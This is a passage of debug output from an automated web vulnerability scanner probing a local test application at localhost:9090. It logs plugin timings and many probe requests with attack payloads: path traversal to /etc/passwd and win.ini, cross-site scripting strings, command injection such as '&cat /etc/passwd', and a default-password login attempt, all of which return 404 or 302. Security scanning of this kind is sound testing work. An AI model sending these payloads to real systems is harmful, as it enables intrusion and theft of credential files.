directory_indexing.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] lang.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] strange_reason.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] url_session.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.02s to run [Wed Feb 12 10:04:26 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] cache_control.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] strange_headers.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] ssn.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] oracle.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] error_pages.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.01s to run [Wed Feb 12 10:04:26 2020 - debug] feeds.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4351. [Wed Feb 12 10:04:26 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.03s to run [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/./ returned HTTP code "404" (id=22774,from_cache=0,grep=1,rtt=0.02,did=7nxeZj5z) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4352. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/html/cgi-bin/cgicso?query= returned HTTP code "404" (id=22776,from_cache=0,grep=1,rtt=0.10,did=d00ZAqv7) [Wed Feb 12 10:04:26 2020 - debug] localhost:9090 connection pool stats (free:103 / in_use:6 / max:50 / total:109) [Wed Feb 12 10:04:26 2020 - debug] Connections with more in use time: (f68474ff126c8504, 0.13 sec) (eacfb106b12a40d5, 0.11 sec) (650348b5951f295c, 0.11 sec) (6bfd72a4a3ceaa0d, 0.09 sec) (49303da565ef873b, 0.08 sec) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4353. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/666\n\n666.jsp returned HTTP code "404" (id=22775,from_cache=0,grep=1,rtt=0.07,did=VvIiKEQz) [Wed Feb 12 10:04:26 2020 - debug] wordnet.discover(did="LVAPaZfI",uri="http://localhost:9090/cmd.jsp") took 765.39s to run [Wed Feb 12 10:04:26 2020 - debug] find_backdoors.discover(http://localhost:9090/, did=GJRmEWqJ) [Wed Feb 12 10:04:26 2020 - debug] [find_backdoors] Crawling "http://localhost:9090/" [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2107. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/modules.php?letter=">=&op=modload&name=Members_List&file=index returned HTTP code "404" (id=22779,from_cache=0,grep=1,rtt=0.06,did=6JDI3RUw) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/way-board.cgi?db=/etc/passwd\x00 returned HTTP code "404" (id=22780,from_cache=0,grep=1,rtt=0.10,did=Nu25TTrm) [Wed Feb 12 10:04:26 2020 - debug] memcachei.audit(did="XPiImkm3",uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") took 299.63s to run [Wed Feb 12 10:04:26 2020 - debug] mx_injection.audit(did="OHWDD5OZ", uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") [Wed Feb 12 10:04:26 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a2_broken_auth" () [Wed Feb 12 10:04:26 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:OHWDD5OZ) [Wed Feb 12 10:04:26 2020 - debug] ldapi.audit(did="ZQmu1dEV",uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") took 299.47s to run [Wed Feb 12 10:04:26 2020 - debug] response_splitting.audit(did="IA1Ax2dn", uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") [Wed Feb 12 10:04:26 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a2_broken_auth" () [Wed Feb 12 10:04:26 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:IA1Ax2dn) [Wed Feb 12 10:04:26 2020 - debug] buffer_overflow.audit(did="2FLunfPQ",uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") took 298.58s to run [Wed Feb 12 10:04:26 2020 - debug] rfd.audit(did="zKNvUOHg", uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") [Wed Feb 12 10:04:26 2020 - debug] URL "http://localhost:9090/learn/vulnerability/a2_broken_auth" is not vulnerable to RFD because response content-type is "text/html" and content-disposition header is missing, response id 1741 [Wed Feb 12 10:04:26 2020 - debug] rfd.audit(did="zKNvUOHg",uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] rfi.audit(did="E53sjBpj", uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") [Wed Feb 12 10:04:26 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a2_broken_auth" () [Wed Feb 12 10:04:26 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:E53sjBpj) [Wed Feb 12 10:04:26 2020 - debug] redos.audit(did="IYb32qRy",uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") took 297.01s to run [Wed Feb 12 10:04:26 2020 - debug] frontpage.audit(did="0mzA355q", uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4354. [Wed Feb 12 10:04:26 2020 - debug] digit_sum.discover(did="YtCzzkvs",uri="http://localhost:9090/cmd.jspx") took 288.81s to run [Wed Feb 12 10:04:26 2020 - debug] web_spider.discover(http://localhost:9090/, did=8FTaqqFG) [Wed Feb 12 10:04:26 2020 - debug] [web_spider] Crawling "http://localhost:9090/" [Wed Feb 12 10:04:26 2020 - debug] xpath.audit(did="4GfPbo8d",uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") took 295.70s to run [Wed Feb 12 10:04:26 2020 - debug] file_upload.audit(did="Of46xzvB", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:26 2020 - debug] file_upload.audit(did="Of46xzvB",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] csrf.audit(did="y62dyydP", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:26 2020 - debug] csrf.audit(did="y62dyydP",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] dot_ds_store.discover(did="e2k51WHB",uri="http://localhost:9090/cmd.jspx") took 286.71s to run [Wed Feb 12 10:04:26 2020 - debug] find_captchas.discover(http://localhost:9090/, did=vgAGS40U) [Wed Feb 12 10:04:26 2020 - debug] [find_captchas] Crawling "http://localhost:9090/" [Wed Feb 12 10:04:26 2020 - debug] deserialization.audit(did="ZRKVOBSF", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:26 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:26 2020 - debug] HEAD http://localhost:9090/Config1.htm returned HTTP code "404" (id=22783,from_cache=0,grep=1,rtt=0.06,did=8pVTyuhE) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories==&parent_id=0 returned HTTP code "404" (id=22785,from_cache=0,grep=1,rtt=0.15,did=LeKdA6Ka) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/loadpage.cgi?user_id=1&file=..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini returned HTTP code "404" (id=22786,from_cache=0,grep=1,rtt=0.06,did=d7Qnityy) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\\boot.ini returned HTTP code "404" (id=22782,from_cache=0,grep=1,rtt=0.15,did=haRlm2r1) [Wed Feb 12 10:04:26 2020 - debug] find_backdoors.discover(did="GJRmEWqJ",uri="http://localhost:9090/") took 0.10s to run [Wed Feb 12 10:04:26 2020 - debug] wsdl_finder.discover(http://localhost:9090/, did=2CAVHfP6) [Wed Feb 12 10:04:26 2020 - debug] [wsdl_finder] Crawling "http://localhost:9090/" [Wed Feb 12 10:04:26 2020 - debug] frontpage.audit(did="0mzA355q",uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") took 0.06s to run [Wed Feb 12 10:04:26 2020 - debug] os_commanding.audit(did="pU260yyC", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:26 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:26 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:26 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:pU260yyC) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd returned HTTP code "404" (id=22777,from_cache=0,grep=1,rtt=0.06,did=OdYVkBio) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/index.php?dir= returned HTTP code "404" (id=22778,from_cache=0,grep=1,rtt=0.07,did=CtooENaY) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4355. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/goform/CheckLogin?login=root&password=tslinux returned HTTP code "404" (id=22788,from_cache=0,grep=1,rtt=0.04,did=b9a3pqSp) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir c:\\= returned HTTP code "404" (id=22789,from_cache=0,grep=1,rtt=0.04,did=BOOlQJZr) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini returned HTTP code "404" (id=22784,from_cache=0,grep=1,rtt=0.04,did=gHZMwy1y) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/supporter/index.php?t=updateticketlog&id=<=<=&script=>=>=&=&/script= returned HTTP code "404" (id=22781,from_cache=0,grep=1,rtt=0.12,did=oqCDPgoj) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/index.php?option=search&searchword== returned HTTP code "404" (id=22787,from_cache=0,grep=1,rtt=0.02,did=HumkpojQ) [Wed Feb 12 10:04:26 2020 - debug] xxe.audit(did="q36O2CY5",uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") took 284.90s to run [Wed Feb 12 10:04:26 2020 - debug] lfi.audit(did="pHFtiEnA", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:26 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:26 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:pHFtiEnA) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2108. [Wed Feb 12 10:04:26 2020 - debug] wsdl_finder.discover(did="2CAVHfP6",uri="http://localhost:9090/") took 0.12s to run [Wed Feb 12 10:04:26 2020 - debug] wordpress_enumerate_users.discover(http://localhost:9090/, did=aIEomevY) [Wed Feb 12 10:04:26 2020 - debug] [wordpress_enumerate_users] Crawling "http://localhost:9090/" [Wed Feb 12 10:04:26 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a2_broken_auth" () [Wed Feb 12 10:04:26 2020 - debug] dot_listing.discover(did="nAQwvSyg",uri="http://localhost:9090/") took 281.22s to run [Wed Feb 12 10:04:26 2020 - debug] dwsync_xml.discover(http://localhost:9090/, did=Mm2Lb8rK) [Wed Feb 12 10:04:26 2020 - debug] [dwsync_xml] Crawling "http://localhost:9090/" [Wed Feb 12 10:04:26 2020 - debug] ssi.audit(did="0emh8385",uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") took 285.84s to run [Wed Feb 12 10:04:26 2020 - debug] sqli.audit(did="AESHSGVw", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:26 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:26 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:AESHSGVw) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4356. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2109. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4357. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4358. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0 returned HTTP code "404" (id=22790,from_cache=0,grep=1,rtt=0.20,did=h2RCNJkO) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/edittag/edittag.cgi?file=/../../../../../etc/passwd returned HTTP code "404" (id=22792,from_cache=0,grep=1,rtt=0.07,did=94Rz3Sza) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/servlet/ContentServer?pagename= returned HTTP code "404" (id=22793,from_cache=0,grep=1,rtt=0.03,did=naV0L3hD) [Wed Feb 12 10:04:26 2020 - debug] HEAD http://localhost:9090/guestbook/?number=5&lng== returned HTTP code "404" (id=22794,from_cache=0,grep=1,rtt=0.04,did=d7mieVmh) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4359. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2110. [Wed Feb 12 10:04:26 2020 - debug] wordnet.discover(did="Asjn9b1M",uri="http://localhost:9090/") took 179.86s to run [Wed Feb 12 10:04:26 2020 - debug] pykto.discover(http://localhost:9090/, did=T19vJH6O) [Wed Feb 12 10:04:26 2020 - debug] [pykto] Crawling "http://localhost:9090/" [Wed Feb 12 10:04:26 2020 - debug] preg_replace.audit(did="sWfEwDfN",uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") took 257.61s to run [Wed Feb 12 10:04:26 2020 - debug] blind_sqli.audit(did="8Pbh8J3A", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:26 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:26 2020 - debug] payment_webhook_finder.discover(did="cC6xwxJ1",uri="http://localhost:9090/") took 56.87s to run [Wed Feb 12 10:04:26 2020 - debug] wordpress_fullpathdisclosure.discover(http://localhost:9090/, did=fxh4ctE4) [Wed Feb 12 10:04:26 2020 - debug] [wordpress_fullpathdisclosure] Crawling "http://localhost:9090/" [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2111. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4360. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd\x00.html returned HTTP code "404" (id=22791,from_cache=0,grep=1,rtt=0.25,did=qagtPL10) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2112. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4361. [Wed Feb 12 10:04:26 2020 - debug] pykto.discover(did="T19vJH6O",uri="http://localhost:9090/") took 0.03s to run [Wed Feb 12 10:04:26 2020 - debug] digit_sum.discover(http://localhost:9090/, did=rDdsULHd) [Wed Feb 12 10:04:26 2020 - debug] [digit_sum] Crawling "http://localhost:9090/" [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/imp/mailbox.php3?actionID=6&server=x&imapuser=x\'&somesql --=&pass=x returned HTTP code "404" (id=22796,from_cache=0,grep=1,rtt=0.11,did=t4Vf4frW) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/../../../../../windows/win.ini returned HTTP code "404" (id=22797,from_cache=0,grep=1,rtt=0.10,did=MRtdhxUC) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2113. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4362. [Wed Feb 12 10:04:26 2020 - debug] HEAD http://localhost:9090/cgi-bin/myguestbook.cgi?action=view returned HTTP code "404" (id=22795,from_cache=0,grep=1,rtt=0.11,did=0J6tbnkf) [Wed Feb 12 10:04:26 2020 - debug] localhost:9090 connection pool stats (free:103 / in_use:6 / max:50 / total:109) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/sqlqhit.asp returned HTTP code "404" (id=22798,from_cache=0,grep=1,rtt=0.11,did=SNHqSmUg) [Wed Feb 12 10:04:26 2020 - debug] global_redirect.audit(did="sQjn3zbh",uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") took 297.19s to run [Wed Feb 12 10:04:26 2020 - debug] phishing_vector.audit(did="EP9oEKZQ", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:26 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:26 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:EP9oEKZQ) [Wed Feb 12 10:04:26 2020 - debug] Connections with more in use time: (f68474ff126c8504, 0.12 sec) (650348b5951f295c, 0.12 sec) (872ee7d98f5906e9, 0.11 sec) (784a5da77f81edc0, 0.07 sec) (49303da565ef873b, 0.06 sec) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num= returned HTTP code "404" (id=22804,from_cache=0,grep=1,rtt=0.08,did=VgfVknXs) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/msadc/samples/adctest.asp returned HTTP code "404" (id=22807,from_cache=0,grep=1,rtt=0.03,did=ZTqMqnHA) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/replymsg.php?send=1&destin= returned HTTP code "404" (id=22803,from_cache=0,grep=1,rtt=0.08,did=48Tg6Lvl) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/iissamples/issamples/SQLQHit.asp returned HTTP code "404" (id=22802,from_cache=0,grep=1,rtt=0.16,did=vvt968aQ) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-local/cgiemail-1.4/cgicso?query= returned HTTP code "404" (id=22806,from_cache=0,grep=1,rtt=0.07,did=bbGo5atA) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\x00 returned HTTP code "404" (id=22801,from_cache=0,grep=1,rtt=0.05,did=GsyxeOCM) [Wed Feb 12 10:04:26 2020 - debug] HEAD http://localhost:9090/contents/extensions/asp/1 returned HTTP code "404" (id=22808,from_cache=0,grep=1,rtt=0.10,did=K0tfZ24t) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=22809,from_cache=0,grep=1,rtt=0.13,did=stnMWTYw) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse /etc/passwd= returned HTTP code "404" (id=22805,from_cache=0,grep=1,rtt=0.11,did=F2IX4A8b) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/phorum/admin/header.php?GLOBALS[message]= returned HTTP code "404" (id=22799,from_cache=0,grep=1,rtt=0.06,did=7GVajL1y) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/default.htm returned HTTP code "404" (id=22811,from_cache=0,grep=1,rtt=0.09,did=L83R2oyp) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=22816,from_cache=1,grep=1,rtt=0.09,did=aNJj5Nx7) [Wed Feb 12 10:04:26 2020 - debug] "http://localhost:9090/" (id:22816, code:302, len:28, did:aNJj5Nx7) is NOT a 404 [URL 404 cache] [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4363. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/modules/Forums/bb_smilies.php?name= returned HTTP code "404" (id=22813,from_cache=0,grep=1,rtt=0.16,did=QoS2bPou) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/https-admserv/bin/index?/= returned HTTP code "404" (id=22823,from_cache=0,grep=1,rtt=0.05,did=73skiGMc) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/addressbook/index.php?surname= returned HTTP code "404" (id=22825,from_cache=0,grep=1,rtt=0.11,did=jG5y28uz) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/gallery/search.php?searchstring= returned HTTP code "404" (id=22812,from_cache=0,grep=1,rtt=0.05,did=aiqvOzgz) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003\x00-1&month= returned HTTP code "404" (id=22822,from_cache=0,grep=1,rtt=0.06,did=N4VnhWJ5) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/webamil/test.php returned HTTP code "404" (id=22817,from_cache=0,grep=1,rtt=0.16,did=uc5dGbJM) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/emailfriend/emailnews.php?id=\\" returned HTTP code "404" (id=22810,from_cache=0,grep=1,rtt=0.05,did=eFEKl54L) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/profiles.php?what=contact&author=ich&authoremail=bla@bla.com&subject=hello&message=text&uid=<=<=&script=>=>=&alert(document.cookie)=&/script= returned HTTP code "404" (id=22814,from_cache=0,grep=1,rtt=0.12,did=tp6wgeR9) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/viewsource?/etc/passwd= returned HTTP code "404" (id=22818,from_cache=0,grep=1,rtt=0.12,did=VlnCLfqj) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/members.asp?SF="&}alert(223344)=&function x(){v =" returned HTTP code "404" (id=22824,from_cache=0,grep=1,rtt=0.10,did=DIe8pGx2) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/tst.bat|dir ..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\, returned HTTP code "404" (id=22819,from_cache=0,grep=1,rtt=0.10,did=tVtzjxxs) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1 \x00\\"> returned HTTP code "404" (id=22820,from_cache=0,grep=1,rtt=0.04,did=A7TR87sS) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/etc/passwd returned HTTP code "404" (id=22815,from_cache=0,grep=1,rtt=0.10,did=gNT6HJpq) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/SQLQHit.asp returned HTTP code "404" (id=22828,from_cache=0,grep=1,rtt=0.07,did=HmLt3bE3) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4364. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/wp-login.php returned HTTP code "404" (id=22831,from_cache=1,grep=1,rtt=0.18,did=mM583COe) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/athenareg.php?pass= &cat /etc/passwd= returned HTTP code "404" (id=22821,from_cache=0,grep=1,rtt=0.15,did=GLMf2qim) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/myphpnuke/links.php?op=search&query=[script]alert(\'Vulnerable)&[/script]?query= returned HTTP code "404" (id=22830,from_cache=0,grep=1,rtt=0.16,did=apJXw0DK) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/modules.php?op=modload&name=DMOZGateway&file=index&topic= returned HTTP code "404" (id=22826,from_cache=0,grep=1,rtt=0.14,did=8x8n4E6K) [Wed Feb 12 10:04:26 2020 - debug] Still have 1 unfinished tasks in CrawlInfraIn join() [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd returned HTTP code "404" (id=22829,from_cache=0,grep=1,rtt=0.07,did=e6KcqP9M) [Wed Feb 12 10:04:26 2020 - debug] wordpress_enumerate_users.discover(did="aIEomevY",uri="http://localhost:9090/") took 0.68s to run [Wed Feb 12 10:04:26 2020 - debug] open_api.discover(http://localhost:9090/, did=lPyThtc2) [Wed Feb 12 10:04:26 2020 - debug] [open_api] Crawling "http://localhost:9090/" [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/wp-login.php returned HTTP code "404" (id=22833,from_cache=1,grep=1,rtt=0.18,did=yD7df92F) [Wed Feb 12 10:04:26 2020 - debug] wordpress_fullpathdisclosure.discover(did="fxh4ctE4",uri="http://localhost:9090/") took 0.63s to run [Wed Feb 12 10:04:26 2020 - debug] dot_ds_store.discover(http://localhost:9090/, did=2q5dwpyO) [Wed Feb 12 10:04:26 2020 - debug] [dot_ds_store] Crawling "http://localhost:9090/" [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4365. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/downloads/pafiledb.php?action=email&id=4?\\"<=<=&script=>=>=&alert(\'Vulnerable\')=&/script=&\\"= returned HTTP code "404" (id=22827,from_cache=0,grep=1,rtt=0.12,did=qho2e0eX) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd returned HTTP code "404" (id=22832,from_cache=0,grep=1,rtt=0.17,did=8CW49nNP) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4365. [Wed Feb 12 10:04:26 2020 - 